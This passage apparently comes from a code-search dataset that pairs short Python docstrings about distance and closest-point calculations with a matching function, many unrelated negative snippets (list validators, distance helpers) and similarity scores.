inputs[_input] == \"\":\n if \"list\" not in _input:\n result = False\n return result", "def _check_list(self, input_list, switch_list):\n\n return_list = []\n for vid in input_list:\n if str(vid) in switch_list:\n return_list.append(vid)\n return return_list", "def validateListValue(self, list_name, list_value):\n try:\n con = self.getMetadataDatabaseConnection()\n results = 0\n results = con.cursor().callproc('qiime_assets.validate_list_value', [list_name, list_value, results])\n return results[2]\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), e)\n return False", "def is_valid_label(label: Union[str, List[str]]) -> bool:\n if isinstance(label, list):\n for item in label:\n if not isinstance(item, str):\n return False\n return True\n return isinstance(label, str)", "def _is_list(arg):\n if isinstance(arg, dict):\n return False\n if isinstance(arg, str): # Python 3-only, as str has __iter__\n return False\n return (\n not _has_method(arg, \"strip\")\n and _has_method(arg, \"__getitem__\")\n or _has_method(arg, \"__iter__\")\n )", "def assertInList(value, values, msg):\n\tassert value in values, msg", "def allin(list1, list2):\n for rule1 in list1:\n literals1 = [literal for literal in rule1]\n for rule2 in list2:\n literals2 = [literal for literal in rule2]\n if literals1 != literals2:\n # If there is one rule different, then is not a sublist\n return False\n return True", "def test_list(self):\n parser = parse_args(['-g', '10', '-s', 'bubble', '-l'])\n self.assertTrue(parser.list)\n self.assertEqual(True, parser.list)\n\n parser = parse_args(['-g', '10', '-s', 'bubble'])\n self.assertEqual(False, parser.list)", "def isvect(x):\n return isinstance(x,list) and len(x) == 4 and isgoodnum(x[0]) and isgoodnum(x[1]) and isgoodnum(x[2]) and isgoodnum(x[3])", "def is_mat_list(list_matrices):\n flag = True\n if isinstance(list_matrices, list):\n for matrix in list_matrices:\n if not isinstance(matrix, np.matrix):\n flag = False\n # TODO Check for matrix dimensions?\n else:\n flag = False\n return flag", "def test_list_string():\n assert is_list_of_strings(None) is None\n assert is_list_of_strings('a')\n assert is_list_of_strings(['a']) is None\n assert is_list_of_strings([1])", "def isValidTypeForList(self, *args):\n return _libsbml.MultiListOfReactionsPlugin_isValidTypeForList(self, *args)", "def is_valid_format(format_string): \n # default\n is_valid = True\n \n # list of valid formats\n valid_formats = ['hex', 'char', 'schar','uint', 'int', 'double', \n 'ascii', 'long', 'long long', 'float']\n \n # list of formats provided (may be a single format)\n format_list = format_string.split(', ')\n \n # check each item in the provided list\n for item in format_list:\n \n # if it does not match a valid format then it is invalid\n if item not in valid_formats:\n is_valid = False\n # end if\n # end for\n \n return is_valid", "def list_should_contain_sub_list(self,list1,list2,msg=None,values=True):\r\n diffs = ', '.join(unic(item) for item in list2 if item not in list1)\r\n default = 'Folling values were not found form first list:'+ diffs\r\n _verify_condition(diffs == '',default,msg,values)", "def assertValidPlist(self, data):\r\n # Just try the load. If it throws an exception, the test case will fail.\r\n self.serializer.from_plist(data)", "def test_allowed_list(self):\n val = DwcaValidator(yaml.load(self.yaml_allowed_list, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'rightsHolder': 'INBO'}\n self.assertTrue(val.validate(document))\n document = {'rightsHolder': 'ILVO'}\n self.assertFalse(val.validate(document))\n document = {'sex': 'male'}\n self.assertTrue(val.validate(document))\n document = {'sex': 'female'}\n self.assertTrue(val.validate(document))\n document = {'sex': 'Female'}\n self.assertFalse(val.validate(document))\n document = {'age': 'adult'}\n self.assertTrue(val.validate(document))\n document = {'age': 'juvenile'}\n self.assertTrue(val.validate(document))\n document = {'age': 'adult | juvenile'}\n self.assertTrue(val.validate(document))\n document = {'age': 'adult|juvenile'}\n self.assertFalse(val.validate(document))", "def validate_list(validators, data):\n if type(data) is not list:\n return False\n n_validators = len(validators)\n if n_validators == 0:\n return len(data) == 0\n elif n_validators == 1:\n validator = validators[0]\n return all(imap(lambda item: validate_common(validator, item), data))\n elif n_validators > 1:\n raise NotImplementedError(\"You cannot specify more than one validator for list at the moment.\")", "def uniqueCheckString(aList):\r\n check = ','\r\n for v in aList:\r\n if f',{v},' in check:\r\n return True\r\n check = f'{check}{v},'\r\n return False", "def is_valid_date(lst):\n invalid_date = []\n for date in lst:\n try:\n year = int(date[:4])\n month = int(date[5:7])\n day = int(date[8:10])\n except:\n invalid_date.append(date)\n return invalid_date\n day_count_for_month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if year%4==0 and (year%100 != 0 or year%400==0):\n day_count_for_month[2] = 29\n valid = (1 <= month <= 12 and 1 <= day <= day_count_for_month[month])\n if not valid: \n invalid_date.append(date)\n return invalid_date", "def check_def(self,data_list):\n\n if type(data_list)!=list:\n data_list=[data_list]\n \n for value in data_list:\n if type(eval('self.'+value))==str:\n print \"failed for\", value\n return 0\n return 1", "def check_correct_numbers(puzzle_size: int, puzzle_list: list) -> None:\n for number in range(puzzle_size * puzzle_size):\n if number not in puzzle_list:\n raise ParsingError(\"Puzzle does not contain expected numbers.\")", "def check(city: str, country: str, list_of_streets: list) -> bool:\n if not isinstance(city, str) or not isinstance(country, str) or not isinstance(list_of_streets, (list, tuple)):\n raise TypeError\n\n a = re.compile('(?:[a-zA-Zа-яА-Я0-9][a-zA-Zа-яА-Я0-9 -]+)')\n if not a.fullmatch(city) or not a.fullmatch(country):\n raise ValueError\n for street in list_of_streets:\n if not isinstance(street, str):\n raise TypeError\n if not a.fullmatch(street):\n raise ValueError\n return True", "def indexists(list, *args): # Technically doesn't have to do with the screen, but it is very useful. \n return all([int(arg) < len(list) for arg in args])", "def test_string_list(self):\n \n self.assertListEqual(\n [\n [5, 3, 1],\n [3, 5],\n [20, 13, 0]\n ],\n [\n maps.map_list(['hello', 'why', 'y']),\n maps.map_list(['yes', 'enjoy']),\n maps.map_list(['15236487921068952470', 'commemoration', ''])\n ])" ]
[ "0.7171144", "0.7102635", "0.70879775", "0.7007761", "0.6736717", "0.67267084", "0.6715916", "0.6705785", "0.6677589", "0.66702265", "0.6668745", "0.6659545", "0.6606097", "0.65899694", "0.6580848", "0.6565618", "0.65465", "0.65330225", "0.65142834", "0.65126836", "0.6511854", "0.6466202", "0.6459701", "0.64475846", "0.6414915", "0.64027363", "0.64013183", "0.6395754", "0.6393286", "0.6377765", "0.63475096", "0.63259226", "0.6317885", "0.6315992", "0.63121647", "0.630819", "0.62761754", "0.6271626", "0.6263358", "0.624776", "0.62354636", "0.6233458", "0.6217592", "0.6208877", "0.61886317", "0.61742747", "0.6150474", "0.6144085", "0.6138559", "0.61135906", "0.6099268", "0.608303", "0.6075169", "0.6059304", "0.6039519", "0.60360146", "0.60320294", "0.6029582", "0.60118014", "0.6008514", "0.600366", "0.59871644", "0.5978662", "0.597381", "0.5967144", "0.59648466", "0.5964127", "0.5958442", "0.59557915", "0.595531", "0.5939545", "0.5938277", "0.593524", "0.5933027", "0.5923132", "0.59127015", "0.59044886", "0.5897581", "0.58843195", "0.5877836", "0.58769214", "0.58695364", "0.5839355", "0.58384883", "0.5837516", "0.5832995", "0.5831299", "0.58303", "0.582933", "0.58277994", "0.5823394", "0.5796669", "0.5789193", "0.57832605", "0.5782409", "0.57793933", "0.5763534", "0.5761622", "0.57608646", "0.5760441", "0.575492" ]
0.0
-1
Calculate the distance between two points with same dimensions.
def distance_between(point_one, point_two): sum = 0 for d1,d2 in zip(point_one,point_two): sum += math.pow(float(d1) - float(d2), 2) return math.sqrt(sum)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def distance(self, point_a, point_b):\n distance = 0.0\n if len(self.dimensions) > 1:\n for a, b, dim in zip(point_a, point_b, self.dimensions):\n distance += dim.distance(a, b)\n\n if len(self.dimensions) == 1:\n distance += self.dimensions[0].distance(point_a[0], point_b[0])\n\n return distance", "def __get_distance(point1: np.ndarray, point2: np.ndarray) -> float:\n return np.sqrt(np.sum(np.square(point1 - point2)))", "def distance(self, point_1=(0, 0), point_2=(0, 0)):\n\t\treturn math.sqrt((point_1[0]-point_2[0])**2+(point_1[1]-point_2[1])**2)", "def distance(a: Point, b: Point) -> float:\n return math.sqrt(math.pow(b.x - a.x, 2) + math.pow(b.y - a.y, 2))", "def calculateDistance(point1, point2, dimension):\n distance=0\n # print 'p1: ' + str(point1) + 'p2: ' + str(point2) + str(dimension)\n for x in range(dimension - 1):\n distance += pow((point1[x] - point2[x]), 2)\n return math.sqrt(distance)", "def distance_to(self, point1, point2):\n delta_x = self.x_points[point1] - self.x_points[point2]\n delta_y = self.y_points[point1] - self.y_points[point2]\n return math.sqrt(delta_x * delta_x + delta_y * delta_y)", "def distance(pt1, pt2):\n\tx1, y1 = pt1\n\tx2, y2 = pt2\n\tx = x2 - x1\n\ty = y2 - y1\n\ts = x**2 + y**2\n\treturn np.sqrt(s)", "def distance(point_1=(0, 0), point_2=(0, 0)):\n return math.sqrt(\n (point_1[0] - point_2[0]) ** 2 +\n (point_1[1] - point_2[1]) ** 2)", "def distance(self, p1, p2):\n return math.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)", "def distance(self, x1, x2):\n return np.sum(np.power((x1-x2),2.0))", "def distance_between_points(a: Point, b: Point) -> float:\n return math.sqrt((a.x - b.x)**2 + (a.y - b.y)**2)", "def distance(self,coord_1, coord_2):\n return np.sqrt(np.sum((np.array(coord_1)-np.array(coord_2))**2))", "def getDistanceBetweenTwoPoints(self, one, two):\n dx = one.x - two.x\n dy = one.y - two.y\n return math.sqrt(dx * dx + dy * dy)", "def _get_dist(self, p1, p2): \r\n\r\n distance = np.sqrt(\r\n (p1[0] - p2[0]) ** 2 +\r\n (p1[1] - p2[1]) ** 2 +\r\n (p1[2] - p2[2]) ** 2)\r\n\r\n return distance", "def dist(a: Point, b: Point):\n return (a.x - b.x) ** 2 + (a.y - b.y) ** 2", "def distance_between_points(p1,p2):\n return math.sqrt((p2.x-p1.x)**2+(p2.y-p1.y)**2)", "def calculate_distance(P1, P2):\n if len(P1) != len(P2):\n raise ValueError('Different dimension of given points.')\n\n square_sum = 0\n for i in range(len(P1)):\n square_sum += (P1[i] - P2[i])**2\n\n return square_sum**(1 / 2)", "def get_distance(pt1,pt2):\r\n x1 = pt1[1]\r\n y1 = pt1[0]\r\n x2 = pt2[1]\r\n y2 = pt2[0]\r\n d = np.sqrt((x2-x1)**2 + (y2-y1)**2)\r\n return d", "def get_distance(point_a, point_b):\n \n return np.sqrt(np.sum((point_a - point_b) ** 2, 1))", "def distance(p0, p1):\n return( numpy.sqrt( (p0[0]-p1[0])**2 + \n (p0[1]-p1[1])**2 + \n (p0[2]-p1[2])**2 ) )", "def distance (p1,p2):\n return np.sqrt(np.sum(np.power(p2-p1,2)))", "def distance(self, c1, c2):\r\n x = (c2.x - c1.x) ** 2\r\n y = (c2.y - c1.y) ** 2\r\n d = int(round(math.sqrt(x + y)))\r\n return d", "def distance(p1,p2):\n return ((p1.x - p2.x)**2 + (p1.y - p2.y)**2)**0.5", "def distance(p1, p2):\n return math.hypot(p1.x-p2.x, p1.y-p2.y)", "def distance(coords1, coords2):\n dx = coords1.x - coords2.x\n dy = coords1.y - coords2.y\n return math.sqrt(dx * dx + dy * dy)", "def distance(xy1, xy2):\n x_dist = xy2[0] - xy1[0]\n y_dist = xy2[1] - xy1[1]\n dist = np.sqrt(x_dist ** 2 + y_dist ** 2)\n return dist", "def distance(point1, point2):\n return math.sqrt(math.pow((point1[0] - point2[0]), 2) +\n math.pow(point1[1] - point2[1], 2))", "def distance(a, b):\n return math.sqrt((a.x - b.x) ** 2 + (a.y - b.y) ** 2)", "def distance_between_two_points(p1, p2):\n return math.sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)", "def distance(point1, point2):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n\n dx = x1 - x2\n dy = y1 - y2\n\n return math.sqrt(dx * dx + dy * dy)", "def distance(point1, point2):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n\n dx = x1 - x2\n dy = y1 - y2\n\n return math.sqrt(dx * dx + dy * dy)", "def distance(self, other):\n xd, yd = self.x-other.x, self.y-other.y\n return math.sqrt(xd**2 + yd**2)", "def distance(a,b):\n return np.sqrt( (x(a)-x(b))**2 + (y(a)-y(b))**2 )", "def distance(x,y):\n return np.sqrt( np.power(np.array(x) - np.array(y), 2).sum() )", "def distance(pt1, pt2):\n return (pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2", "def distance(p1,p2):\n return ((p2.x - p1.x)*2 + (p2.y - p1.y))**0.5", "def dist(self, one, two):\n return np.sqrt((one[0] - two[0]) ** 2 + (one[1] - two[1]) ** 2)", "def getDistance(point1,point2):\n dx = point2[0]-point1[0]\n dy = point2[1]-point1[1]\n return math.sqrt(dy*dy + dx*dx)", "def calculate_distance(p1, p2):\n\n dist = np.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n\n return dist", "def dist(pt1, pt2):\n return np.sqrt((pt2[0]-pt1[0])**2 + (pt2[1]-pt1[1])**2)", "def distance(p1, p2):\n return np.linalg.norm(np.array(p1) - np.array(p2))", "def compute_distance(point_1, point_2):\n x1, y1, x2, y2 = point_1[0], point_1[1], point_2[0], point_2[1]\n distance = np.sqrt((x2-x1)**2 + (y2-y1)**2)\n\n return distance", "def distance(self, other):\n dx = self.x - other.x\n dy = self.y - other.y\n return math.sqrt(dx*dx + dy*dy)", "def distance(self,other):\n return math.sqrt((self.x - other.x)**2 +(self.y - other.y)**2)", "def distance(p1, p2):\n return math.sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2 + (p1[2]-p2[2])**2)", "def distance(p1, p2):\n\treturn sqrt((p1[1]-p2[1])**2 + (p1[0]-p2[0])**2)", "def distance(p1, p2):\n return math.sqrt((math.pow((p2[0] - p1[0]), 2) + math.pow((p2[1] - p1[1]), 2)))", "def distance_to(self, other):\n if type(other) == GeoPoint:\n other = other.to_cartesian()\n d0 = self.x - other.x\n d1 = self.y - other.y\n d2 = self.z - other.z\n\n return math.sqrt(d0 * d0 + d1 * d1 + d2 * d2)", "def distance_2d(pt1, pt2):\r\n return geometry.gmXyDistance(pt1, pt2)", "def getDistance(point1, point2x, point2y):\n distance = np.sqrt((point2x - point1[0])**2 + (point2y - point1[1])**2)\n return distance", "def get_distance(self, other):\n return math.sqrt((self.x - other[0])**2 + (self.y - other[1])**2)", "def get_distance(point1, point2):\n a = (point1['x'] - point2['x']) ** 2\n b = (point1['y'] - point2['y']) ** 2\n return (a + b) ** (1.0 / 2)", "def distance(point1, point2):\n return ((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2) ** 0.5", "def get_distance_between(self, p1, p2):\n\t\treturn math.sqrt(math.pow((p1.x - p2.x), 2) + math.pow((p1.y - p2.y), 2))", "def _distance(point_a: tuple, point_b: tuple):\n # rgb values\n x1, y1, z1 = point_a\n x2, y2, z2 = point_b\n\n # distances\n dx = x1 - x2\n dy = y1 - y2\n dz = z1 - z2\n\n # final distance\n return sqrt(dx**2 + dy**2 + dz**2)", "def distance(self, other):\n return math.sqrt((self.x - other.x)**2 + (self.y - other.y)**2)", "def distance(p1, p2):\r\n return math.hypot(p1[0] - p2[0], p1[1] - p2[1])", "def get_distance(self, dim):\n p_1, p_2 = self.points\n nb_dim = len(p_1.values)\n\n other_p = copy.deepcopy(self.points[0])\n for d in range(nb_dim):\n if d == dim:\n continue\n other_p[d] = p_2[d]\n return p_1.distance(other_p)", "def distance(p1, p2):\n return np.linalg.norm(p2-p1)", "def calculate_point_distance(p1, p2):\n\n return math.sqrt(math.pow(p1[0]-p2[0],2) + math.pow(p1[1]-p2[1],2))", "def distance(p1, p2):\n return sqrt((p1[0]-p2[0])**2 + (p1[1]-p2[1])**2)", "def distance(self, other: PointOrIterable = None) -> float:\n return (self.distance_squared(other or Point())) ** 0.5", "def distance(self, other: \"Point\") -> float:\n if not isinstance(other, self.__class__):\n raise TypeError(\"Expected `other` to be an instance of `{}`\"\\\n .format(self.__class__))\n dx = self.x - other.x\n dy = self.y - other.y\n return sqrt((dx ** 2) + (dy ** 2))", "def distance(p1,p2):\n import numpy as np\n x = np.sqrt(sum(np.power(p2-p1,2)))\n return(x)", "def distance(P1, P2):\n return ((P1[0] - P2[0])**2 + (P1[1] - P2[1])**2) ** 0.5", "def distance(pos1, pos2):\n return math.sqrt((pos1[0] - pos2[0])**2. + (pos1[1] - pos2[1])**2.)", "def get_distance(first: Point, second: Point) -> Float:\n\n return sqrt(\n (second.x - first.x) ** 2\n +\n (second.y - first.y) ** 2\n )", "def distance(x1, y1, x2, y2):\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5", "def distance(self, point1, point2):\n\n\t\tprint \"Inside Distance!-----\"\n\t\tdist = math.pow(point1[0] - point2[0], 2) + math.pow(point1[1] - point2[1], 2);\n\t\treturn dist", "def distanceTwoPoints(self,A,B):\n #productive\n # used by addNeedleToScene\n profprint()\n length = ( (A[0]-B[0])**2 + (A[1]-B[1])**2 + (A[2]-B[2])**2 ) ** 0.5\n return length", "def distance_to(self, other):\n dx = other.x - self.x\n dy = other.y - self.y\n return math.sqrt(dx ** 2 + dy ** 2)", "def distance(p1, p2):\n\n return sqrt(((p2[0] - p1[0])**2) + ((p2[1] - p1[1])**2))", "def _get_distance(a, b):\n return np.sqrt(np.sum((a - b) ** 2))", "def getDistance(self, x1, x2, y1, y2):\n return ((x1 - x2)**2 + (y1 - y2)**2)**0.5", "def getDistance(self,p1,p2):\n return sum([(p1[i]-p2[i])**2 for i in range(2)])", "def distance(point0, point1):\n if point0 is None or point1 is None:\n return None\n diff = np.subtract(point0, point1)\n return np.sqrt(diff[0] ** 2 + diff[1] ** 2)", "def pointPointDistance(p1,p2):\n llsq = 0.0 # line length squared\n # faster, only for 2D\n h = p2[0] - p1[0]\n llsq = llsq + (h*h)\n h = p2[1] - p1[1]\n llsq = llsq + (h*h)\n return math.sqrt(llsq)\n\n for i in range(len(p1)): # each dimension, general case\n h = p2[i] - p1[i]\n llsq = llsq + (h*h)\n return math.sqrt(llsq)", "def distance(p_1, p_2):\n return ((p_2[0] - p_1[0]) ** 2 + (p_2[1] - p_1[1]) ** 2 \\\n + (p_2[2] - p_1[2]) ** 2) ** 0.5", "def distance(x1, y1, x2, y2):\n dist = ((x1-x2)**2 + (y1-y2)**2)**0.5\n return dist", "def distance(self, other):\n\n return hypot(self.x - other.x, self.y - other.y)", "def nn_distance(xyz1, xyz2):\n return _op_library.nn_distance(xyz1, xyz2)", "def calc_point_distance(x1, y1, x2, y2):\n\n return math.hypot(x2 - x1, y2 - y1)", "def calc_dist(c1: Coordinates, c2: Coordinates = None) -> float:\n\t\n\t# Get distances for each dimension in a common unit, meters.\n\tlat_dist = (c1.lat - c2.lat) * LAT_RATIO\n\tlong_dist = (c1.lon - c2.lon) * LONG_RATIO\n\treturn math.sqrt(lat_dist**2 + long_dist**2)", "def distance(self,pose1, pose2):\n return math.sqrt((pose1[0] - pose2[0]) ** 2 + (pose1[1] - pose2[1]) ** 2) + 0.001", "def _distance(coord1, coord2):\n xdist = coord1[0] - coord2[0]\n ydist = coord1[1] - coord2[1]\n return sqrt(xdist*xdist + ydist*ydist)", "def distance(cls, atom_1, atom_2):\n\t\t\n\t\treturn np.linalg.norm((atom_1-atom_2).atom_loc)", "def calculate_distance(asteroid_1: Asteroid, asteroid_2: Asteroid) -> float:\n dy = asteroid_2.y - asteroid_1.y\n dx = asteroid_2.x - asteroid_1.x\n return math.sqrt(dy * dy + dx * dx)", "def calculate_distance(point1, point2):\n # modify points to be a [x,y,z] numpy array\n np_point_1 = convert_point_type(point1)\n np_point_2 = convert_point_type(point2)\n\n distance = ((np_point_1[0] - np_point_2[0])**2 + (np_point_1[1] - np_point_2[1])**2)**0.5\n\n return distance", "def distance(d1, d2):\n projection_onto_plane = d2 - projection(d1, d2)\n dist = np.linalg.norm(projection_onto_plane)\n\n return dist", "def distance(self, other):\n return float(abs(self.x - other.x) + abs(self.y - other.y))", "def get_distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 * 2.38 - y2 * 2.38) ** 2)", "def distance_point_point(a, b):\n ab = subtract_vectors(b, a)\n return length_vector(ab)", "def euclidean_distance(x1: np.ndarray, x2: np.ndarray) -> float:\n return np.sqrt(np.square(x1 - x2).sum())", "def distance(point_1, point_2, units=1):\n\n distance = (((point_2[0]-point_1[0])*units)**2.0\n + ((point_2[1]-point_1[1])*units)**2.0\n + ((point_2[2]-point_1[2])*units)**2.0)**0.5\n \n return distance", "def dist(pnt1, pnt2):\n return ((pnt2[0] - pnt1[0])**2 + (pnt2[1] - pnt1[1])**2 + (pnt2[2] - pnt1[2])**2)**0.5", "def distance(self, a, b):\n raise NotImplementedError()", "def point_to_point_distance(p1:Point, p2: Point) -> float:\n return round(geopy.distance.distance((p1.y, p1.x), (p2.y, p2.x)).km,2)", "def distance(a, b):\n return (np.sum((a - b)**2))**0.5", "def calculate_distance(self, other):\n return math.sqrt((self.center[0] - other.center[0]) ** 2 + (self.center[1] - other.center[1]) ** 2)", "def getDistance(X1, X2):\n distance = 0 \n length = len(X1)\n for i in range(length):\n distance += (X1[i] - X2[i])**2 # differences of the columns squared\n \n distance = math.sqrt(distance)\n\n return distance", "def dist_points(x,y):\n\n return abs(x[0]-y[0]) + abs(x[1]-y[1])" ]
[ "0.80836755", "0.79572546", "0.77294564", "0.7520677", "0.75188065", "0.75087476", "0.7456917", "0.74458915", "0.74410594", "0.7438067", "0.7431563", "0.74289346", "0.7414903", "0.7412151", "0.7408342", "0.74023426", "0.7388828", "0.73793226", "0.7354223", "0.73516434", "0.7341085", "0.73321843", "0.7331452", "0.7325296", "0.73134154", "0.73122746", "0.7294608", "0.72888505", "0.7281666", "0.72773945", "0.72773945", "0.72707295", "0.72628284", "0.72552073", "0.72493607", "0.7249056", "0.72461355", "0.72275", "0.72257024", "0.72216505", "0.7219577", "0.72171664", "0.72125775", "0.7209189", "0.7183512", "0.71731037", "0.7170826", "0.7157193", "0.714449", "0.7140532", "0.7139583", "0.71288276", "0.71283084", "0.7123573", "0.7120928", "0.71067595", "0.7105097", "0.7095602", "0.7088737", "0.7083018", "0.7079986", "0.7077365", "0.7072321", "0.70719445", "0.70709705", "0.7069592", "0.70612687", "0.70559686", "0.7052649", "0.7039639", "0.7039022", "0.70334315", "0.7033265", "0.7029674", "0.7015537", "0.7011539", "0.7011342", "0.7001549", "0.6997126", "0.69969606", "0.69906396", "0.6987742", "0.69818693", "0.6972531", "0.69720954", "0.6970313", "0.6968658", "0.6966963", "0.6964845", "0.6964351", "0.6964214", "0.6961497", "0.6960939", "0.6957567", "0.69572157", "0.69562685", "0.6955678", "0.69547915", "0.69501215", "0.69379383", "0.69321203" ]
0.0
-1
Finds the closest points in a given list of Point objects. There are two for loops because I imagined the Point list this way. y > represents the rows x > represents the columns
def find_closest_points(points): closest_dist = float("inf") closest_points = None, None for y, point_one in enumerate(points): for x, point_two in enumerate(points): if x > y: dist= distance_between(point_one.points,point_two.points) if dist < closest_dist: closest_dist = dist closest_points= point_one, point_two return closest_points
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def closest_points(self, points, maxdist=None):\n return [self.closest_point(point, maxdist) for point in points]", "def closest_dist(x, y, x_list, y_list):\n points = np.array([x, y]).T\n points_list = np.array([x_list, y_list]).T\n\n dpt0 = points_list[:, 0] - points[:, 0, np.newaxis]\n dpt1 = points_list[:, 1] - points[:, 1, np.newaxis]\n\n return np.argmin((dpt0*dpt0 + dpt1*dpt1), axis=1)", "def bruteClosest(list_points):\n\n minimum = 0\n p1 = 0\n p2 = 0\n for i in list_points:\n for k in list_points:\n \n d = dist(i,k)\n if (d < minimum and d != 0) or minimum == 0:\n p1 = i\n p2 = k\n minimum = d\n return [p1, p2, minimum]", "def closest(point, points):\n pts = [(Point.distance(point, p), p) for p in points]\n pts.sort()\n return pts[0][1]", "def closest_point(point, points):\n return points[cdist([point], points).argmin()]", "def brute_closest_pair(points):\n n = len(points)\n min_distance = float(\"inf\")\n last_pair = None\n for i in range(n):\n for j in range(i+1, n):\n result = distance(points[i], points[j])\n if result < min_distance:\n min_distance = result\n last_pair = [points[i], points[j]]\n return last_pair", "def closest_points(point, points, nn=1):\n\n eu_dsts = point - points\n eu_dsts = np.sqrt((eu_dsts * eu_dsts).sum(axis=1))\n n_ids = np.argsort(eu_dsts)\n out_points = np.zeros(shape=(nn, 3))\n for i in range(nn):\n out_points[i] = points[n_ids[i], :]\n return out_points", "def closest_points_naive(self, x, y):\r\n # Running time: O(n ** 2)\r\n\r\n dist = []\r\n for i in range(len(x)):\r\n for j in range(i+1, len(x)):\r\n d = self.get_euclidean_distance(x[i], x[j], y[i], y[j])\r\n dist.append(d)\r\n \r\n return min(dist)", "def _linear_nearest_neighbour(all_points: list, pivot: tuple):\n best_dist = None\n nearest = None\n for point in all_points:\n dist = _distance(point, pivot)\n if best_dist is None or dist < best_dist:\n best_dist = dist\n nearest = point\n return best_dist, nearest", "def nearest_point(pt):\n nearest_point = None\n min_dist = float(\"inf\")\n for p in cur_points:\n dist = euclidean_dist(pt, p.to_tuple())\n if dist < min_dist:\n min_dist, nearest_point = dist, p\n\n return nearest_point.to_tuple()", "def nearest_line(city_points):\n closest = 10000\n nodes = None\n for item in linear_list:\n line = item[2]\n nearest = abs(line[1] * city_points[0] + line[0] * city_points[1] + line[2]) \\\n / math.sqrt(line[1] ** 2 + line[0] ** 2)\n x = get_x(line, city_points)\n y = get_y(line, city_points)\n x1 = get_node_points(item[0])[0]\n x2 = get_node_points(item[1])[0]\n y1 = get_node_points(item[0])[1]\n y2 = get_node_points(item[1])[1]\n\n if ((x <= x1) & (x >= x2)) | ((x >= x1) & (x <= x2)):\n if ((y <= y1) & (y >= y2)) | ((y >= y1) & (y <= y2)):\n if nearest < closest:\n closest = nearest\n nodes = (item[0], item[1], item[2])\n return nodes", "def _nearest(arrlist_1, arrlist_2):\n tree = KDTree(arrlist_1);\n pts = tree.query(arrlist_2)\n\n return tree.data[pts[1][pts[0].argmin()]]", "def get_nearest(src_points, candidates, k_neighbors=1):\r\n\r\n # Create tree from the candidate points. leaf-size só muda o processamento, e a métrica é a forma de cálculo, que no caso é a Great Circle Distances\r\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\r\n\r\n # Find closest points and distances. K é a quantidade de pontos que queremos a dis^tanica e SRC points são os pontos\r\n distances, indices = tree.query(src_points, k=k_neighbors)\r\n\r\n # Transpose to get distances and indices into arrays\r\n distances = distances.transpose()\r\n indices = indices.transpose()\r\n\r\n # Get closest indices and distances (i.e. array at index 0)\r\n # note: for the second closest points, you would take index 1, etc.\r\n closest = indices[0]\r\n closest_dist = distances[0]\r\n\r\n # Return indices and distances\r\n return (closest, closest_dist)", "def get_nearest(src_points, candidates, k_neighbors=1):\n\n # Create tree from the candidate points\n tree = BallTree(candidates, leaf_size=15, metric='haversine')\n distances, indices = tree.query(src_points, k=k_neighbors)\n\n # Transpose to get distances and indices into arrays\n distances = distances.transpose()\n indices = indices.transpose()\n\n # Get closest indices and distances (i.e. array at index 0)\n # note: for the second closest points, you would take index 1, etc.\n closest = indices[0]\n closest_dist = distances[0]\n\n # Return indices and distances\n return closest, closest_dist", "def closest_object(geometries, point): \n min_dist, min_index = min((point.distance(geom), k) \n for (k, geom) in enumerate(geometries))\n \n return geometries[min_index], min_dist, min_index", "def nearest_points(self, lat, lon, npt=1):\n # Use sin of lat lon to handle periodic\n # and not worry about if we are in negative\n # degrees\n #shape is shape of lat/lon grid\n# dist = xu.hypot(xu.sin(xu.radians(self['lat'].values)) -\n# xu.sin(xu.radians(lat)),\\\n# xu.cos(xu.radians(self['lon'].values)) - \n# xu.cos(xu.radians(lon)))\n # ST I changed dist to this because commented dist wasn't working right- \n #it was finding points from halfway around the world before\n dist = self.distance_to_point(lat,lon)\n # Get indices of the flattened array\n nearest_raw = dist.argsort(axis=None)[:npt]\n flat_array = dist.flatten()\n distances = flat_array[nearest_raw]\n # Convert back to 2-d coords\n closey, closex = np.unravel_index(nearest_raw, self['lon'].shape)\n #return nearest\n return closey, closex, distances", "def _nearest_to_point(self, point):\n ptvertex = point.get_vertex(crs=self.crs)\n segments = zip(self.vertices.slice(0, -1), self.vertices.slice(1, 0))\n\n if isinstance(self.crs, CartesianCRS):\n func = _cvectorgeo.pt_nearest_planar\n def func(seg):\n return _cvectorgeo.pt_nearest_planar(ptvertex[0], ptvertex[1],\n seg[0][0], seg[0][1], seg[1][0], seg[1][1])\n else:\n fwd = self.crs.forward\n inv = self.crs.inverse\n def func(seg):\n return _cvectorgeo.pt_nearest_proj(fwd, inv, ptvertex,\n seg[0], seg[1], tol=0.01)\n\n point_dist = map(func, segments)\n min_point = None\n min_dist = -1.0\n for i, (point, dist) in enumerate(point_dist):\n if dist < min_dist or (i == 0):\n min_point = point\n min_dist = dist\n\n return min_dist, min_point", "def closest(self, x, y):\n pts = np.column_stack([self.x, self.y])\n # Transform data coordinates to pixel coordinates.\n pts = self.ax.transData.transform(pts)\n diff = pts - [x, y]\n dist = np.hypot(*diff.T)\n min_index = np.argmin(dist)\n return min_index, dist[min_index]", "def closest_point(self, point, maxdist=0.0):\n face, point = self.geometry.ClosestPoint(Rhino.Geometry.Point3d(*point), maxdist)\n return list(point)", "def get_k_closest_points(point, data, k, distance_metric):\n points_and_scores = []\n k_closest_points = []\n for item in data:\n item_score = distance_metric(point, item)\n points_and_scores.append([item, item_score])\n points_and_scores = sorted(points_and_scores, key = lambda item:(item[1], item[0].coords))\n for i in range(k):\n k_closest_points.append(points_and_scores[i][0])\n return k_closest_points", "def FindClosestNPoints(self, p_int, , vtkIdList):\n ...", "def closest(centroids,coordinates):\n tup = [(cen[0], haversine(coordinates,cen[1])) for cen in 